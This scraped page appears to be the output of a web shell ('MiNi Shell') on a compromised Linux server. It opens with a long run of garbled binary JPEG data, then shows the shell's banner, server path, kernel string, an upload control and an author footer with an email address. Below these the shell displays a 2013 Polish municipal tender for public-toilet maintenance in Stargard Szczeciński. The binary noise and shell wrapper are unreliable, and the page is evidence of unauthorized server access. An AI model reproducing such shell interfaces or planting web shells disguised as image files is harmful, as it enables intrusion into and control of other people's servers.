JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/472094-N-2013.html

<p class="kh_header"><b>Stargard Szczeciński: Usługa utrzymania szaletów publicznych w Stargardzie Szczecińskim.</b><br>
<b>Numer ogłoszenia: 472094 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Usług Komunalnych w Stargardzie Szczecińskim , ul. Pierwszej Brygady 35, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 91 834 18 30 do 34, faks 91 834 18 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zuk-stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa utrzymania szaletów publicznych w Stargardzie Szczecińskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa usługa utrzymania szaletów publicznych w obiektach Gminy - Miasto Stargard Szczeciński.
1.utrzymanie szaletów publicznych:
a.przy placu Targowym,b.przy placu Wolności, c.w kontenerze socjalnym adoptowanym na użytek szaletu publicznego przy ul. Basztowej,
2.utrzymanie czystości wraz z odbiorem odpadów oraz usługa utrzymania zimowego
a.na chodnikach, zieleńcach, zjazdach z drogi publicznej oraz na miejscach do parkowania dla osób niepełnosprawnych - na terenach przynależnych do szaletu przy placu Targowym,b. na chodnikach oraz zieleńcach - na terenach przynależnych do szaletu przy placu Wolności,c. na chodnikach, zieleńcach, zjazdach z drogi publicznej, na placu manewrowym oraz na miejscach postojowych - na terenach przynależnych do szaletu przy ul. Basztowej.
3. Szczegółowy opis i zakres usług oraz minimalne wymagania
1.Udostępnianie szaletów
a. w godzinach otwarcia szaletu przy placu Targowym
w okresie od 1 września do 30 kwietnia od poniedziałku do piątku: od 6.00 do 19.00
soboty: od 6.00 do 17.00
niedziele i święta: od 7.00 do 17.00
w okresie od 1 maja do 31 sierpnia od poniedziałku do piątku: od 6.00 do 20.00
soboty od 6.00 do 18.00 niedziele i święta: od 7.00 do 18.00
b.w godzinach otwarcie szaletu przy placu Wolności
w okresie od 1 września do 30 kwietnia codziennie od 7.00 do 20.00
w okresie od 1 maja do 31 sierpnia codziennie od 7.00 do 21.00
c.w godzinach otwarcie szaletu przy ul. Basztowej.
w okresie od 1 września do 30 kwietnia codziennie od 8.00 do 17.00
w okresie od 1 maja do 31 sierpnia codziennie od 8.00 do 20.00
d.w pierwszym dniu świąt Wielkiej Nocy oraz Bożego Narodzenia wszystkie szalety będą nieczynne, informację o tym Wykonawca umieści od dnia poprzedzającego w widocznym miejscu, przy wejściu do obiektu,
e.w sobotę poprzedzającą święto Wielkiej Nocy, 24 grudnia i 31 grudnia wszystkie szalety będą czynne do godz. 14.00; informację o tym Wykonawca umieści od dnia poprzedzającego, w widocznym miejscu przy wejściu do obiektu,
f.w dniu 1 listopada  szalet przy placu Targowym i przy ul. Basztowej będą nieczynne, informację o tym Wykonawca umieści od dnia poprzedzającego, w widocznym miejscu przy wejściu do obiektu,
g.w czasie trwania imprez masowych lub festynów (np. Dni Stargardu, Sylwester, Finał Wielkiej Orkiestry Świątecznej Pomocy, Coolturalnych wakacji itp.) przedłużenie godzin otwarcia szaletów publicznych nastąpi po zgłoszeniu takiej konieczności przez inspektora wyznaczonego przez Zamawiającego  na warunkach cenowych zawartych w ofercie dodatkowe godziny,
2.Wykonawca podczas realizacji usługi zapewni pracownika obsługi odpowiedzialnego za otwieranie i zamykanie obiektów, codziennie w godzinach udostępniania szaletów, 
3.Zgodnie z przepisami określającymi zasady korzystania z szaletów miejskich Gminy  Miasto Stargard Szczeciński - korzystanie z szaletów jest nieodpłatne, w przypadku zmiany przepisów, zastrzega się wprowadzenie odpowiednich zmian w umowie, 
4.Wykonawca winien zapewnić odpowiednie warunki sanitarne do korzystania z obiektów, w tym m.in.
a.bieżącą kontrolę czystości obiektów ,wewnątrz i na zewnątrz oraz stosowanie się do wskazówek inspektora wyznaczonego przez Zamawiającego lub inspektora sanitarnego,
b.stałe utrzymanie czystości i właściwego stanu sanitarno,higienicznego pomieszczeń i urządzeń w obiektach, mycie i dezynfekcje podłóg, ścian, stolarki drzwiowej i okiennej, urządzeń sanitarnych, itp.,
mycie i czyszczenie elementów zewnętrznych obiektów,
zbieranie odpadów z zapewnieniem ich unieszkodliwiania,
deratyzację zgodnie z zapisami Regulaminu Utrzymania czystości i porządku na terenie Gminy  Miasta Stargard Szczeciński lub w przypadku zaistnienia takiej konieczności.
c.stałe utrzymanie czystości i porządku na terenach powierzonych do utrzymania
zamiatanie miejsc utwardzonych, usuwanie odpadów rozproszonych, rozlanych cieczy, wyrastających roślin, itp.
odśnieżanie i usuwanie śliskości na powierzchniach utwardzonych, usuwanie błota pośniegowego,
pielęgnację zieleni koszenie trawy, odchwaszczanie, usuwanie resztek roślin, odpadów, nawożenie, podlewanie, odtwarzanie trawnika,
zbieranie odpadów z zapewnieniem ich unieszkodliwiania,
d.wyposażenie obiektów w środki czystości papier toaletowy, ręczniki jednorazowego użytku, mydło, środki czyszczące i myjące itp., 
e.gromadzenie w odpowiednich pojemnikach i usuwanie powstających odpadów, mycie i dezynfekcja tych pojemników
f.zapewnienie ciepłej wody,
g.zapewnienie oświetlenia pomieszczeń i obiektu,
h.zapewnienie ogrzewania i wentylacji pomieszczeń,
i.zapewnienie bezpieczeństwa dla obsługi obiektów, osób korzystających z powierzonego mienia w razie potrzeby wynajęcie ochrony osobowej, monitoringu obiektu,
j.prowadzenie książek kontroli sanitarnej
5.Wykonawca winien zapewnić stałą sprawność techniczną i dbać o estetykę obiektu, poprzez m.in.
a.bieżącą kontrolę stanu obiektów i ich wyposażenia wewnątrz i na zewnątrz obiektów, prowadzenie okresowych przeglądów technicznych, prowadzenie książki obiektów budowlanych w zakresie wymaganym Prawem Budowlanym,
b.oczyszczanie i odnawianie malowanie elementów zewnętrznych obiektów elewacji budynków, dachów, itp. w razie zaistnienia takiej potrzeby,
c.malowanie ścian, sufitów w obiektach minimum raz w roku. UWAGA za wyjątkiem paneli grzewczych zamontowanych w suficie w szalecie publicznym zlokalizowanym przy placu Targowym.
d.czyszczenie i udrażnianie elementów zewnętrznych budynku takich jak rynny odpływowe,
e.niezwłoczne usuwanie skutków wandalizmu, kradzieży, zdarzeń losowych, złych warunków pogodowych, itp., nie dotyczy skutków aktów wandalizmu mających charakter trwałego 
i nieodwracalnego zniszczenia wyposażenia,
f.prowadzenie bieżących napraw i niezwłoczne usuwanie drobnych usterek,
g.zabezpieczenie powierzonego mienia przed: skutkami wandalizmu, kradzieży, przed zdarzeniami losowymi, złymi warunkami pogodowymi, itp.,
h.bieżącą wymianę elementów zużywalnych (np.: żarówek, uszczelek),
i.prowadzenie przeglądów okresowych, konserwacja i naprawa urządzeń grzejnych, wentylacyjnych i klimatyzacyjnych,
j.zapewnienie bezpieczeństwa przeciwpożarowego ,zapewnienie sprawnych gaśnic oraz prowadzenie ich przeglądów okresowych, legalizacji, itp.,
k.utrzymanie ,w razie potrzeby wymiana na nowe tablic informacyjnych WC zamontowanych na eksploatowanych obiektach lub na słupach oświetlenia ulicznego.
6.W gestii Wykonawcy leży ubezpieczenie powierzonych obiektów m.in. pod względem zabezpieczonego mienia oraz od odpowiedzialności cywilnej w zakresie utrzymania obiektów szaletów i powierzonego terenu,
7.Wykonawca, z zastrzeżeniem pkt 7 zawrze umowy na dostawę mediów i odbiór odpadów oraz będzie pokrywał koszty
a.dostawy wody i odprowadzanie ścieków,
b.odbieranie odpadów komunalnych,
c.dostawy energii elektrycznej
d.telefonów
8.w przypadku objęcie przez miasto nieruchomości niezamieszkałych zintegrowanym systemem odbioru i zagospodarowania odpadów, Wykonawca, w zakresie powierzonych obiektów i terenów,
a.złoży stosowne deklaracje oraz wniesie odpowiednie opłaty w imieniu miasta,
b.zapewni realizację pozostałych obowiązków miasta, wynikających z przepisów 
o utrzymaniu czystości i porządku, wyposażenie nieruchomości w pojemniki, mycie 
i dezynfekcję pojemników, itp.,
9.Zamawiający wymaga od Wykonawcy dyspozycyjności, utrzymania bezwzględnej czystości na utrzymywanych terenach poprzez ciągłe monitorowanie i reagowanie  na fakty  naruszenia czystości  bez zbędnej zwłoki, informując o tym na bieżąco Zamawiającego.
Rodzaje usług przewidzianych do realizacji przez okres trwania zamówienia określa załącznik ofertowy Nr 1. Zamawiający zastrzega sobie korektę poszczególnych usług w zależności od bieżących potrzeb oraz posiadanych środków finansowych w dowolnym zakresie.
10.Podczas realizacji usługi Wykonawca zobowiązany jest do używania takiego sprzętu, narzędzi i środków transportu, które nie spowodują niekorzystnego wpływu na jakość świadczenia usług, będą w dobrym stanie i gotowości do pracy, będą spełniały normy ochrony środowiska i instrukcje dotyczące użytkowania, a środki transportu będą dopuszczone do ruchu po drogach publicznych.
11.Wykonawca zobowiązany jest na bieżąco, na własny koszt usuwać wszystkie uszkodzenia nawierzchni i urządzeń oraz wszystkie zanieczyszczenia spowodowane przez jego pracowników lub  jego pojazdy na terenie działania, na drogach i na dojazdach do utrzymywanego terenu.
12.Minimalne wymagania w zakresie utrzymania terenów przyległych
a.Tereny utwardzone ,chodnik, parking uznaje się za utrzymane w czystości jeżeli nie stwierdzono na nich zabrudzeń, występowania odpadów a z nawierzchni nie wyrastają rośliny,
b.Tereny uznaje się za odśnieżone, jeżeli wykonano na nich usługę i nie stwierdzono śliskości, zalegania śniegu, lodu i błota pośniegowego uwaga, koszt odśnieżania ujęty będzie w koszcie usługi oczyszczania wg punktu 2 formularza ofertowego, dla celów kalkulacyjnych należy przyjąć odśnieżanie w okresie zimowym i uśredniając na cały okres zamówienia ten koszt, wkalkulować go w koszt punktu 2 - koszty ryczałtu miesięcznego za Usługa oczyszczania z odbiorem odpadów i utrzymaniem zieleni oraz usługą odśnieżania, usuwania śliskości lub usuwania błota pośniegowego, obejmować więc będzie również koszty odśnieżania wykonywanego faktycznie jedynie w okresie występowania opadów,
c.Zieleń uznaje się utrzymaną jeżeli, trawa nie rośnie powyżej 15 cm wysokości i nie zalegają na niej odpady..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust 1 pkt 6 ustawy, o maksymalnej wartości nie przekraczającej 30 proc. wartości zamówienia podstawowego. Ewentualnie zamówienie uzupełniające polegać może na:
a. Zleceniu utrzymania kolejnego szaletu miejskiego oddanego do użytkowania w czasie obowiązywania umowy,
b. Zlecenie utrzymania szaletów na okres po terminie 31 grudnia 2017 r. w  przypadku, gdy prowadzone uprzednio, z należytą starannością i odpowiednio wcześnie wszczęte następne postępowanie przetargowe na świadczenie usługi będącej przedmiotem niniejszego postępowania, nie doprowadzi do wyboru oferty najkorzystniejszej i zawarcia umowy przed dniem 31 grudnia 2017 r.  Zlecenie to byłoby udzielane na okres niezbędny dla przeprowadzenia skutecznego postępowania przetargowego i doprowadzenie do zawarcia nowej umowy.
Możliwość udzielenia zamówienia uzupełniającego jest jedynie prawem Zamawiającego, nie stanowi żadnego wiążącego zobowiązania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.55.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie ubiegać się mogą Wykonawcy, którzy wykażą wykonanie lub wykonywanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jednego zamówienia o podobnym charakterze, usługi szaletów publicznych, usługi zarządzania lub administrowania nieruchomością, usługi w zakresie oczyszczania nieruchomości, sprzątanie obiektów  o wartości nie mniejszej niż 150 000 PLN brutto. Ocena spełnienia tego warunku, według reguły spełnia/nie spełnia, dokonana zostanie na podstawie treści przedłożonego wykazu zrealizowanych zamówień,sporządzonego wg wzoru załącznika do SIWZ wraz z dokumentami potwierdzającym, że zamówienia te zostały wykonane należycie referencje, oświadczenia poprzednich zleceniodawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów przedkłada także:
a)Pisemne zobowiązania tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
b)W przypadku gdy Wykonawca nie mający wymaganej wiedzy i doświadczenia, a więc Wykonawca niezdolny do wykonania zamówienia, polega na wiedzy i doświadczeniu innego podmiotu - pisemne zobowiązanie tego podmiotu do podjęcia się wykonania zamówienia jako Podwykonawca,
2)Dokumenty wykazujące uprawnienia osoby lub osób podpisujących ofertę do dokonywania czynności prawnych i podejmowania zobowiązań w imieniu Wykonawcy (pełnomocnictwa);
3)Podstawowe informacje o firmie, a w nich m.in.: ile lat firma istnieje; profil i skala działalności, osiągnięcia itp. - [dokument nie obowiązkowy].</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - proponowany sposób realizacji zamówienia wpływającego na jakość i stanadard wykonywanej usługi - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania następujących zmian w umowie:
1)Zmiana umowy dotycząca możliwości zmiany zakresu zamówienia, które Wykonawca może powierzyć Podwykonawcy, innego od zakresu podwykonawstwa określonego przez Wykonawcę w ofercie. Zmiana taka jest dopuszczalna jeżeli nie narusza zastrzeżeń Zamawiającego określonych w SIWZ dotyczących części zamówienia, które nie mogą być powierzane Podwykonawcom,
2)Wszelkie inne zmiany postanowień zawartej umowy, których wprowadzenie nie jest sprzeczne z treścią oferty, na podstawie której dokonano wyboru Wykonawcy oraz nie narusza zasad uczciwej konkurencji i równego traktowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zuk-stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.zuk-stargard.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 10:00, miejsce: Zarząd Usług Komunalnych, pokój 203 (budynek ZNTK) ul. Pierwszej Brygady 35 73-110 Stargard Szczeciński..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com